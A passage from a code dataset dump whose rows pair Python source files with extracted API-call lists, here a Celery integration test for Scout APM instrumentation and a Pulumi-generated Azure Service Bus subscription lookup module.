'(_deviceLabel)\\n', (19180, 19194), False, 'import ctypes\\n'), ((19223, 19247), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\\n', (19239, 19247), False, 'from Phidget22.PhidgetException import PhidgetException\\n'), ((1890, 1913), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (1911, 1913), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((1946, 1969), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (1967, 1969), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((2632, 2655), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (2653, 2655), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((3175, 3198), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (3196, 3198), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((3790, 3813), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (3811, 3813), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n'), ((4483, 4506), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\\n', (4504, 4506), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\\n')]"}}},{"rowIdx":792,"cells":{"code":{"kind":"string","value":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom contextlib import contextmanager\n\nimport celery\nimport pytest\nfrom celery.signals import setup_logging\n\nimport scout_apm.celery\nfrom scout_apm.api import Config\n\n# http://docs.celeryproject.org/en/latest/userguide/testing.html#py-test\nskip_unless_celery_4_plus = pytest.mark.skipif(\n celery.VERSION < (4, 0), reason=\"pytest fixtures added in Celery 4.0\"\n)\n\n\n@setup_logging.connect\ndef do_nothing(**kwargs):\n # Just by connecting to this signal, we prevent Celery from setting up\n # logging - and stop it from interfering with global state\n # http://docs.celeryproject.org/en/v4.3.0/userguide/signals.html#setup-logging\n pass\n\n\n@contextmanager\ndef app_with_scout(app=None, config=None):\n \"\"\"\n Context manager that configures a Celery app with Scout installed.\n \"\"\"\n if app is None:\n app = celery.Celery(\"tasks\", broker=\"memory://\")\n\n # Enable Scout by default in tests.\n if config is None:\n config = {\"monitor\": True}\n\n # Disable running the agent.\n config[\"core_agent_launch\"] = False\n\n @app.task\n def hello():\n return \"Hello World!\"\n\n # Setup according to https://docs.scoutapm.com/#celery\n Config.set(**config)\n scout_apm.celery.install()\n\n try:\n yield app\n finally:\n scout_apm.celery.uninstall()\n # Reset Scout configuration.\n Config.reset_all()\n\n\ndef test_hello_eager(tracked_requests):\n with app_with_scout() as app:\n result = app.tasks[\"tests.integration.test_celery.hello\"].apply()\n\n assert result.result == \"Hello World!\"\n assert len(tracked_requests) == 1\n tracked_request = tracked_requests[0]\n assert \"task_id\" in tracked_request.tags\n assert tracked_request.tags[\"is_eager\"] is True\n assert tracked_request.tags[\"exchange\"] == \"unknown\"\n assert tracked_request.tags[\"routing_key\"] == \"unknown\"\n assert tracked_request.tags[\"queue\"] == \"unknown\"\n assert tracked_request.active_spans == []\n assert len(tracked_request.complete_spans) == 1\n span = tracked_request.complete_spans[0]\n assert span.operation == \"Job/tests.integration.test_celery.hello\"\n\n\n@skip_unless_celery_4_plus\ndef test_hello_worker(celery_app, celery_worker, tracked_requests):\n with app_with_scout(app=celery_app) as app:\n result = app.tasks[\"tests.integration.test_celery.hello\"].delay().get()\n\n assert result == \"Hello World!\"\n assert len(tracked_requests) == 1\n tracked_request = tracked_requests[0]\n assert \"task_id\" in tracked_request.tags\n assert tracked_request.tags[\"is_eager\"] is False\n assert tracked_request.tags[\"exchange\"] == \"\"\n assert tracked_request.tags[\"routing_key\"] == \"celery\"\n assert tracked_request.tags[\"queue\"] == \"unknown\"\n assert (\n 0.0 <= tracked_request.tags[\"queue_time\"] < 60.0\n ) # Assume test took <60 seconds\n assert tracked_request.active_spans == []\n assert len(tracked_request.complete_spans) == 1\n span = tracked_request.complete_spans[0]\n assert span.operation == \"Job/tests.integration.test_celery.hello\"\n\n\n@skip_unless_celery_4_plus\ndef test_hello_worker_header_preset(celery_app, celery_worker, tracked_requests):\n with app_with_scout(app=celery_app) as app:\n result = (\n app.tasks[\"tests.integration.test_celery.hello\"]\n .apply_async(headers={\"scout_task_start\": \"an evil string\"})\n .get()\n )\n\n assert result == \"Hello World!\"\n assert len(tracked_requests) == 1\n tracked_request = tracked_requests[0]\n assert tracked_request.active_spans == []\n assert len(tracked_request.complete_spans) == 1\n span = tracked_request.complete_spans[0]\n assert span.operation == \"Job/tests.integration.test_celery.hello\"\n assert \"queue_time\" not in span.tags\n\n\n@skip_unless_celery_4_plus\ndef test_hello_worker_chain(celery_app, celery_worker, tracked_requests):\n with app_with_scout(app=celery_app) as app:\n hello = app.tasks[\"tests.integration.test_celery.hello\"]\n result = (hello.si() | hello.si()).apply_async().get()\n\n assert result == \"Hello World!\"\n assert len(tracked_requests) == 2\n assert [t.complete_spans[0].operation for t in tracked_requests] == [\n \"Job/tests.integration.test_celery.hello\",\n \"Job/tests.integration.test_celery.hello\",\n ]\n assert \"parent_task_id\" not in tracked_requests[0].tags\n first_task_id = tracked_requests[0].tags[\"task_id\"]\n assert tracked_requests[1].tags[\"parent_task_id\"] == first_task_id\n\n\ndef test_no_monitor(tracked_requests):\n # With an empty config, \"monitor\" defaults to False.\n with app_with_scout(config={}) as app:\n result = app.tasks[\"tests.integration.test_celery.hello\"].apply()\n\n assert result.result == \"Hello World!\"\n assert tracked_requests == []\n"},"apis":{"kind":"list like","value":["scout_apm.api.Config.set","celery.Celery","scout_apm.api.Config.reset_all","pytest.mark.skipif"],"string":"[\n \"scout_apm.api.Config.set\",\n \"celery.Celery\",\n \"scout_apm.api.Config.reset_all\",\n \"pytest.mark.skipif\"\n]"},"extract_api":{"kind":"string","value":"[((367, 461), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(celery.VERSION < (4, 0))'], {'reason': '\"\"\"pytest fixtures added in Celery 4.0\"\"\"'}), \"(celery.VERSION < (4, 0), reason=\\n 'pytest fixtures added in Celery 4.0')\\n\", (385, 461), False, 'import pytest\\n'), ((1268, 1288), 'scout_apm.api.Config.set', 'Config.set', ([], {}), '(**config)\\n', (1278, 1288), False, 'from scout_apm.api import Config\\n'), ((926, 968), 'celery.Celery', 'celery.Celery', (['\"\"\"tasks\"\"\"'], {'broker': '\"\"\"memory://\"\"\"'}), \"('tasks', broker='memory://')\\n\", (939, 968), False, 'import celery\\n'), ((1443, 1461), 'scout_apm.api.Config.reset_all', 'Config.reset_all', ([], {}), '()\\n', (1459, 1461), False, 'from scout_apm.api import Config\\n')]"}}},{"rowIdx":793,"cells":{"code":{"kind":"string","value":"# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi SDK Generator. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! ***\n\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom ... import _utilities\nfrom . import outputs\n\n__all__ = [\n 'GetSubscriptionResult',\n 'AwaitableGetSubscriptionResult',\n 'get_subscription',\n]\n\n@pulumi.output_type\nclass GetSubscriptionResult:\n \"\"\"\n Description of subscription resource.\n \"\"\"\n def __init__(__self__, accessed_at=None, auto_delete_on_idle=None, client_affine_properties=None, count_details=None, created_at=None, dead_lettering_on_filter_evaluation_exceptions=None, dead_lettering_on_message_expiration=None, default_message_time_to_live=None, duplicate_detection_history_time_window=None, enable_batched_operations=None, forward_dead_lettered_messages_to=None, forward_to=None, id=None, is_client_affine=None, lock_duration=None, max_delivery_count=None, message_count=None, name=None, requires_session=None, status=None, system_data=None, type=None, updated_at=None):\n if accessed_at and not isinstance(accessed_at, str):\n raise TypeError(\"Expected argument 'accessed_at' to be a str\")\n pulumi.set(__self__, \"accessed_at\", accessed_at)\n if auto_delete_on_idle and not isinstance(auto_delete_on_idle, str):\n raise TypeError(\"Expected argument 'auto_delete_on_idle' to be a str\")\n pulumi.set(__self__, \"auto_delete_on_idle\", auto_delete_on_idle)\n if client_affine_properties and not isinstance(client_affine_properties, dict):\n raise TypeError(\"Expected argument 'client_affine_properties' to be a dict\")\n pulumi.set(__self__, \"client_affine_properties\", client_affine_properties)\n if count_details and not isinstance(count_details, dict):\n raise TypeError(\"Expected argument 'count_details' to be a dict\")\n pulumi.set(__self__, \"count_details\", count_details)\n if created_at and not isinstance(created_at, str):\n raise TypeError(\"Expected argument 'created_at' to be a str\")\n pulumi.set(__self__, \"created_at\", created_at)\n if dead_lettering_on_filter_evaluation_exceptions and not isinstance(dead_lettering_on_filter_evaluation_exceptions, bool):\n raise TypeError(\"Expected argument 'dead_lettering_on_filter_evaluation_exceptions' to be a bool\")\n pulumi.set(__self__, \"dead_lettering_on_filter_evaluation_exceptions\", dead_lettering_on_filter_evaluation_exceptions)\n if dead_lettering_on_message_expiration and not isinstance(dead_lettering_on_message_expiration, bool):\n raise TypeError(\"Expected argument 'dead_lettering_on_message_expiration' to be a bool\")\n pulumi.set(__self__, \"dead_lettering_on_message_expiration\", dead_lettering_on_message_expiration)\n if default_message_time_to_live and not isinstance(default_message_time_to_live, str):\n raise TypeError(\"Expected argument 'default_message_time_to_live' to be a str\")\n pulumi.set(__self__, \"default_message_time_to_live\", default_message_time_to_live)\n if duplicate_detection_history_time_window and not isinstance(duplicate_detection_history_time_window, str):\n raise TypeError(\"Expected argument 'duplicate_detection_history_time_window' to be a str\")\n pulumi.set(__self__, \"duplicate_detection_history_time_window\", duplicate_detection_history_time_window)\n if enable_batched_operations and not isinstance(enable_batched_operations, bool):\n raise TypeError(\"Expected argument 'enable_batched_operations' to be a bool\")\n pulumi.set(__self__, \"enable_batched_operations\", enable_batched_operations)\n if forward_dead_lettered_messages_to and not isinstance(forward_dead_lettered_messages_to, str):\n raise TypeError(\"Expected argument 'forward_dead_lettered_messages_to' to be a str\")\n pulumi.set(__self__, \"forward_dead_lettered_messages_to\", forward_dead_lettered_messages_to)\n if forward_to and not isinstance(forward_to, str):\n raise TypeError(\"Expected argument 'forward_to' to be a str\")\n pulumi.set(__self__, \"forward_to\", forward_to)\n if id and not isinstance(id, str):\n raise TypeError(\"Expected argument 'id' to be a str\")\n pulumi.set(__self__, \"id\", id)\n if is_client_affine and not isinstance(is_client_affine, bool):\n raise TypeError(\"Expected argument 'is_client_affine' to be a bool\")\n pulumi.set(__self__, \"is_client_affine\", is_client_affine)\n if lock_duration and not isinstance(lock_duration, str):\n raise TypeError(\"Expected argument 'lock_duration' to be a str\")\n pulumi.set(__self__, \"lock_duration\", lock_duration)\n if max_delivery_count and not isinstance(max_delivery_count, int):\n raise TypeError(\"Expected argument 'max_delivery_count' to be a int\")\n pulumi.set(__self__, \"max_delivery_count\", max_delivery_count)\n if message_count and not isinstance(message_count, float):\n raise TypeError(\"Expected argument 'message_count' to be a float\")\n pulumi.set(__self__, \"message_count\", message_count)\n if name and not isinstance(name, str):\n raise TypeError(\"Expected argument 'name' to be a str\")\n pulumi.set(__self__, \"name\", name)\n if requires_session and not isinstance(requires_session, bool):\n raise TypeError(\"Expected argument 'requires_session' to be a bool\")\n pulumi.set(__self__, \"requires_session\", requires_session)\n if status and not isinstance(status, str):\n raise TypeError(\"Expected argument 'status' to be a str\")\n pulumi.set(__self__, \"status\", status)\n if system_data and not isinstance(system_data, dict):\n raise TypeError(\"Expected argument 'system_data' to be a dict\")\n pulumi.set(__self__, \"system_data\", system_data)\n if type and not isinstance(type, str):\n raise TypeError(\"Expected argument 'type' to be a str\")\n pulumi.set(__self__, \"type\", type)\n if updated_at and not isinstance(updated_at, str):\n raise TypeError(\"Expected argument 'updated_at' to be a str\")\n pulumi.set(__self__, \"updated_at\", updated_at)\n\n @property\n @pulumi.getter(name=\"accessedAt\")\n def accessed_at(self) -> str:\n \"\"\"\n Last time there was a receive request to this subscription.\n \"\"\"\n return pulumi.get(self, \"accessed_at\")\n\n @property\n @pulumi.getter(name=\"autoDeleteOnIdle\")\n def auto_delete_on_idle(self) -> Optional[str]:\n \"\"\"\n ISO 8061 timeSpan idle interval after which the topic is automatically deleted. The minimum duration is 5 minutes.\n \"\"\"\n return pulumi.get(self, \"auto_delete_on_idle\")\n\n @property\n @pulumi.getter(name=\"clientAffineProperties\")\n def client_affine_properties(self) -> Optional['outputs.SBClientAffinePropertiesResponse']:\n \"\"\"\n Properties specific to client affine subscriptions.\n \"\"\"\n return pulumi.get(self, \"client_affine_properties\")\n\n @property\n @pulumi.getter(name=\"countDetails\")\n def count_details(self) -> 'outputs.MessageCountDetailsResponse':\n \"\"\"\n Message count details\n \"\"\"\n return pulumi.get(self, \"count_details\")\n\n @property\n @pulumi.getter(name=\"createdAt\")\n def created_at(self) -> str:\n \"\"\"\n Exact time the message was created.\n \"\"\"\n return pulumi.get(self, \"created_at\")\n\n @property\n @pulumi.getter(name=\"deadLetteringOnFilterEvaluationExceptions\")\n def dead_lettering_on_filter_evaluation_exceptions(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether a subscription has dead letter support on filter evaluation exceptions.\n \"\"\"\n return pulumi.get(self, \"dead_lettering_on_filter_evaluation_exceptions\")\n\n @property\n @pulumi.getter(name=\"deadLetteringOnMessageExpiration\")\n def dead_lettering_on_message_expiration(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether a subscription has dead letter support when a message expires.\n \"\"\"\n return pulumi.get(self, \"dead_lettering_on_message_expiration\")\n\n @property\n @pulumi.getter(name=\"defaultMessageTimeToLive\")\n def default_message_time_to_live(self) -> Optional[str]:\n \"\"\"\n ISO 8061 Default message timespan to live value. This is the duration after which the message expires, starting from when the message is sent to Service Bus. This is the default value used when TimeToLive is not set on a message itself.\n \"\"\"\n return pulumi.get(self, \"default_message_time_to_live\")\n\n @property\n @pulumi.getter(name=\"duplicateDetectionHistoryTimeWindow\")\n def duplicate_detection_history_time_window(self) -> Optional[str]:\n \"\"\"\n ISO 8601 timeSpan structure that defines the duration of the duplicate detection history. The default value is 10 minutes.\n \"\"\"\n return pulumi.get(self, \"duplicate_detection_history_time_window\")\n\n @property\n @pulumi.getter(name=\"enableBatchedOperations\")\n def enable_batched_operations(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether server-side batched operations are enabled.\n \"\"\"\n return pulumi.get(self, \"enable_batched_operations\")\n\n @property\n @pulumi.getter(name=\"forwardDeadLetteredMessagesTo\")\n def forward_dead_lettered_messages_to(self) -> Optional[str]:\n \"\"\"\n Queue/Topic name to forward the Dead Letter message\n \"\"\"\n return pulumi.get(self, \"forward_dead_lettered_messages_to\")\n\n @property\n @pulumi.getter(name=\"forwardTo\")\n def forward_to(self) -> Optional[str]:\n \"\"\"\n Queue/Topic name to forward the messages\n \"\"\"\n return pulumi.get(self, \"forward_to\")\n\n @property\n @pulumi.getter\n def id(self) -> str:\n \"\"\"\n Resource Id\n \"\"\"\n return pulumi.get(self, \"id\")\n\n @property\n @pulumi.getter(name=\"isClientAffine\")\n def is_client_affine(self) -> Optional[bool]:\n \"\"\"\n Value that indicates whether the subscription has an affinity to the client id.\n \"\"\"\n return pulumi.get(self, \"is_client_affine\")\n\n @property\n @pulumi.getter(name=\"lockDuration\")\n def lock_duration(self) -> Optional[str]:\n \"\"\"\n ISO 8061 lock duration timespan for the subscription. The default value is 1 minute.\n \"\"\"\n return pulumi.get(self, \"lock_duration\")\n\n @property\n @pulumi.getter(name=\"maxDeliveryCount\")\n def max_delivery_count(self) -> Optional[int]:\n \"\"\"\n Number of maximum deliveries.\n \"\"\"\n return pulumi.get(self, \"max_delivery_count\")\n\n @property\n @pulumi.getter(name=\"messageCount\")\n def message_count(self) -> float:\n \"\"\"\n Number of messages.\n \"\"\"\n return pulumi.get(self, \"message_count\")\n\n @property\n @pulumi.getter\n def name(self) -> str:\n \"\"\"\n Resource name\n \"\"\"\n return pulumi.get(self, \"name\")\n\n @property\n @pulumi.getter(name=\"requiresSession\")\n def requires_session(self) -> Optional[bool]:\n \"\"\"\n Value indicating if a subscription supports the concept of sessions.\n \"\"\"\n return pulumi.get(self, \"requires_session\")\n\n @property\n @pulumi.getter\n def status(self) -> Optional[str]:\n \"\"\"\n Enumerates the possible values for the status of a messaging entity.\n \"\"\"\n return pulumi.get(self, \"status\")\n\n @property\n @pulumi.getter(name=\"systemData\")\n def system_data(self) -> 'outputs.SystemDataResponse':\n \"\"\"\n The system meta data relating to this resource.\n \"\"\"\n return pulumi.get(self, \"system_data\")\n\n @property\n @pulumi.getter\n def type(self) -> str:\n \"\"\"\n Resource type\n \"\"\"\n return pulumi.get(self, \"type\")\n\n @property\n @pulumi.getter(name=\"updatedAt\")\n def updated_at(self) -> str:\n \"\"\"\n The exact time the message was updated.\n \"\"\"\n return pulumi.get(self, \"updated_at\")\n\n\nclass AwaitableGetSubscriptionResult(GetSubscriptionResult):\n # pylint: disable=using-constant-test\n def __await__(self):\n if False:\n yield self\n return GetSubscriptionResult(\n accessed_at=self.accessed_at,\n auto_delete_on_idle=self.auto_delete_on_idle,\n client_affine_properties=self.client_affine_properties,\n count_details=self.count_details,\n created_at=self.created_at,\n dead_lettering_on_filter_evaluation_exceptions=self.dead_lettering_on_filter_evaluation_exceptions,\n dead_lettering_on_message_expiration=self.dead_lettering_on_message_expiration,\n default_message_time_to_live=self.default_message_time_to_live,\n duplicate_detection_history_time_window=self.duplicate_detection_history_time_window,\n enable_batched_operations=self.enable_batched_operations,\n forward_dead_lettered_messages_to=self.forward_dead_lettered_messages_to,\n forward_to=self.forward_to,\n id=self.id,\n is_client_affine=self.is_client_affine,\n lock_duration=self.lock_duration,\n max_delivery_count=self.max_delivery_count,\n message_count=self.message_count,\n name=self.name,\n requires_session=self.requires_session,\n status=self.status,\n system_data=self.system_data,\n type=self.type,\n updated_at=self.updated_at)\n\n\ndef get_subscription(namespace_name: Optional[str] = None,\n resource_group_name: Optional[str] = None,\n subscription_name: Optional[str] = None,\n topic_name: Optional[str] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetSubscriptionResult:\n \"\"\"\n Description of subscription resource.\n\n\n :param str namespace_name: The namespace name\n :param str resource_group_name: Name of the Resource group within the Azure subscription.\n :param str subscription_name: The subscription name.\n :param str topic_name: The topic name.\n \"\"\"\n __args__ = dict()\n __args__['namespaceName'] = namespace_name\n __args__['resourceGroupName'] = resource_group_name\n __args__['subscriptionName'] = subscription_name\n __args__['topicName'] = topic_name\n if opts is None:\n opts = pulumi.InvokeOptions()\n if opts.version is None:\n opts.version = _utilities.get_version()\n __ret__ = pulumi.runtime.invoke('azure-native:servicebus/v20210601preview:getSubscription', __args__, opts=opts, typ=GetSubscriptionResult).value\n\n return AwaitableGetSubscriptionResult(\n accessed_at=__ret__.accessed_at,\n auto_delete_on_idle=__ret__.auto_delete_on_idle,\n client_affine_properties=__ret__.client_affine_properties,\n count_details=__ret__.count_details,\n created_at=__ret__.created_at,\n dead_lettering_on_filter_evaluation_exceptions=__ret__.dead_lettering_on_filter_evaluation_exceptions,\n dead_lettering_on_message_expiration=__ret__.dead_lettering_on_message_expiration,\n default_message_time_to_live=__ret__.default_message_time_to_live,\n duplicate_detection_history_time_window=__ret__.duplicate_detection_history_time_window,\n enable_batched_operations=__ret__.enable_batched_operations,\n forward_dead_lettered_messages_to=__ret__.forward_dead_lettered_messages_to,\n forward_to=__ret__.forward_to,\n id=__ret__.id,\n is_client_affine=__ret__.is_client_affine,\n lock_duration=__ret__.lock_duration,\n max_delivery_count=__ret__.max_delivery_count,\n message_count=__ret__.message_count,\n name=__ret__.name,\n requires_session=__ret__.requires_session,\n status=__ret__.status,\n system_data=__ret__.system_data,\n type=__ret__.type,\n updated_at=__ret__.updated_at)\n"},"apis":{"kind":"list like","value":["pulumi.get","pulumi.getter","pulumi.set","pulumi.InvokeOptions","pulumi.runtime.invoke"],"string":"[\n \"pulumi.get\",\n \"pulumi.getter\",\n \"pulumi.set\",\n \"pulumi.InvokeOptions\",\n \"pulumi.runtime.invoke\"\n]"},"extract_api":{"kind":"string","value":"[((6398, 6430), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"accessedAt\"\"\"'}), \"(name='accessedAt')\\n\", (6411, 6430), False, 'import pulumi\\n'), ((6624, 6662), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"autoDeleteOnIdle\"\"\"'}), \"(name='autoDeleteOnIdle')\\n\", (6637, 6662), False, 'import pulumi\\n'), ((6937, 6981), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"clientAffineProperties\"\"\"'}), \"(name='clientAffineProperties')\\n\", (6950, 6981), False, 'import pulumi\\n'), ((7242, 7276), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"countDetails\"\"\"'}), \"(name='countDetails')\\n\", (7255, 7276), False, 'import pulumi\\n'), ((7470, 7501), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"createdAt\"\"\"'}), \"(name='createdAt')\\n\", (7483, 7501), False, 'import pulumi\\n'), ((7669, 7732), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"deadLetteringOnFilterEvaluationExceptions\"\"\"'}), \"(name='deadLetteringOnFilterEvaluationExceptions')\\n\", (7682, 7732), False, 'import pulumi\\n'), ((8048, 8102), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"deadLetteringOnMessageExpiration\"\"\"'}), \"(name='deadLetteringOnMessageExpiration')\\n\", (8061, 8102), False, 'import pulumi\\n'), ((8389, 8435), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"defaultMessageTimeToLive\"\"\"'}), \"(name='defaultMessageTimeToLive')\\n\", (8402, 8435), False, 'import pulumi\\n'), ((8850, 8907), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"duplicateDetectionHistoryTimeWindow\"\"\"'}), \"(name='duplicateDetectionHistoryTimeWindow')\\n\", (8863, 8907), False, 'import pulumi\\n'), ((9230, 9275), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"enableBatchedOperations\"\"\"'}), \"(name='enableBatchedOperations')\\n\", (9243, 9275), False, 'import pulumi\\n'), ((9521, 9572), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"forwardDeadLetteredMessagesTo\"\"\"'}), \"(name='forwardDeadLetteredMessagesTo')\\n\", (9534, 9572), False, 'import pulumi\\n'), ((9812, 9843), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"forwardTo\"\"\"'}), \"(name='forwardTo')\\n\", (9825, 9843), False, 'import pulumi\\n'), ((10167, 10203), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"isClientAffine\"\"\"'}), \"(name='isClientAffine')\\n\", (10180, 10203), False, 'import pulumi\\n'), ((10438, 10472), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"lockDuration\"\"\"'}), \"(name='lockDuration')\\n\", (10451, 10472), False, 'import pulumi\\n'), ((10705, 10743), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"maxDeliveryCount\"\"\"'}), \"(name='maxDeliveryCount')\\n\", (10718, 10743), False, 'import pulumi\\n'), ((10931, 10965), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"messageCount\"\"\"'}), \"(name='messageCount')\\n\", (10944, 10965), False, 'import pulumi\\n'), ((11272, 11309), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"requiresSession\"\"\"'}), \"(name='requiresSession')\\n\", (11285, 11309), False, 'import pulumi\\n'), ((11749, 11781), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"systemData\"\"\"'}), \"(name='systemData')\\n\", (11762, 11781), False, 'import pulumi\\n'), ((12135, 12166), 'pulumi.getter', 'pulumi.getter', ([], {'name': '\"\"\"updatedAt\"\"\"'}), \"(name='updatedAt')\\n\", (12148, 12166), False, 'import pulumi\\n'), ((1293, 1341), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"accessed_at\"\"\"', 'accessed_at'], {}), \"(__self__, 'accessed_at', accessed_at)\\n\", (1303, 1341), False, 'import pulumi\\n'), ((1510, 1574), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"auto_delete_on_idle\"\"\"', 'auto_delete_on_idle'], {}), \"(__self__, 'auto_delete_on_idle', auto_delete_on_idle)\\n\", (1520, 1574), False, 'import pulumi\\n'), ((1760, 1834), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"client_affine_properties\"\"\"', 'client_affine_properties'], {}), \"(__self__, 'client_affine_properties', client_affine_properties)\\n\", (1770, 1834), False, 'import pulumi\\n'), ((1987, 2039), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"count_details\"\"\"', 'count_details'], {}), \"(__self__, 'count_details', count_details)\\n\", (1997, 2039), False, 'import pulumi\\n'), ((2181, 2227), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"created_at\"\"\"', 'created_at'], {}), \"(__self__, 'created_at', created_at)\\n\", (2191, 2227), False, 'import pulumi\\n'), ((2479, 2601), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"dead_lettering_on_filter_evaluation_exceptions\"\"\"', 'dead_lettering_on_filter_evaluation_exceptions'], {}), \"(__self__, 'dead_lettering_on_filter_evaluation_exceptions',\\n dead_lettering_on_filter_evaluation_exceptions)\\n\", (2489, 2601), False, 'import pulumi\\n'), ((2819, 2921), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"dead_lettering_on_message_expiration\"\"\"', 'dead_lettering_on_message_expiration'], {}), \"(__self__, 'dead_lettering_on_message_expiration',\\n dead_lettering_on_message_expiration)\\n\", (2829, 2921), False, 'import pulumi\\n'), ((3113, 3199), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"default_message_time_to_live\"\"\"', 'default_message_time_to_live'], {}), \"(__self__, 'default_message_time_to_live',\\n default_message_time_to_live)\\n\", (3123, 3199), False, 'import pulumi\\n'), ((3424, 3532), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"duplicate_detection_history_time_window\"\"\"', 'duplicate_detection_history_time_window'], {}), \"(__self__, 'duplicate_detection_history_time_window',\\n duplicate_detection_history_time_window)\\n\", (3434, 3532), False, 'import pulumi\\n'), ((3717, 3793), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"enable_batched_operations\"\"\"', 'enable_batched_operations'], {}), \"(__self__, 'enable_batched_operations', enable_batched_operations)\\n\", (3727, 3793), False, 'import pulumi\\n'), ((4004, 4100), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"forward_dead_lettered_messages_to\"\"\"', 'forward_dead_lettered_messages_to'], {}), \"(__self__, 'forward_dead_lettered_messages_to',\\n forward_dead_lettered_messages_to)\\n\", (4014, 4100), False, 'import pulumi\\n'), ((4238, 4284), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"forward_to\"\"\"', 'forward_to'], {}), \"(__self__, 'forward_to', forward_to)\\n\", (4248, 4284), False, 'import pulumi\\n'), ((4402, 4432), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"id\"\"\"', 'id'], {}), \"(__self__, 'id', id)\\n\", (4412, 4432), False, 'import pulumi\\n'), ((4594, 4652), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"is_client_affine\"\"\"', 'is_client_affine'], {}), \"(__self__, 'is_client_affine', is_client_affine)\\n\", (4604, 4652), False, 'import pulumi\\n'), ((4803, 4855), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"lock_duration\"\"\"', 'lock_duration'], {}), \"(__self__, 'lock_duration', lock_duration)\\n\", (4813, 4855), False, 'import pulumi\\n'), ((5021, 5083), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"max_delivery_count\"\"\"', 'max_delivery_count'], {}), \"(__self__, 'max_delivery_count', max_delivery_count)\\n\", (5031, 5083), False, 'import pulumi\\n'), ((5238, 5290), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"message_count\"\"\"', 'message_count'], {}), \"(__self__, 'message_count', message_count)\\n\", (5248, 5290), False, 'import pulumi\\n'), ((5414, 5448), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"name\"\"\"', 'name'], {}), \"(__self__, 'name', name)\\n\", (5424, 5448), False, 'import pulumi\\n'), ((5610, 5668), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"requires_session\"\"\"', 'requires_session'], {}), \"(__self__, 'requires_session', requires_session)\\n\", (5620, 5668), False, 'import pulumi\\n'), ((5798, 5836), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"status\"\"\"', 'status'], {}), \"(__self__, 'status', status)\\n\", (5808, 5836), False, 'import pulumi\\n'), ((5983, 6031), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"system_data\"\"\"', 'system_data'], {}), \"(__self__, 'system_data', system_data)\\n\", (5993, 6031), False, 'import pulumi\\n'), ((6155, 6189), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"type\"\"\"', 'type'], {}), \"(__self__, 'type', type)\\n\", (6165, 6189), False, 'import pulumi\\n'), ((6331, 6377), 'pulumi.set', 'pulumi.set', (['__self__', '\"\"\"updated_at\"\"\"', 'updated_at'], {}), \"(__self__, 'updated_at', updated_at)\\n\", (6341, 6377), False, 'import pulumi\\n'), ((6572, 6603), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"accessed_at\"\"\"'], {}), \"(self, 'accessed_at')\\n\", (6582, 6603), False, 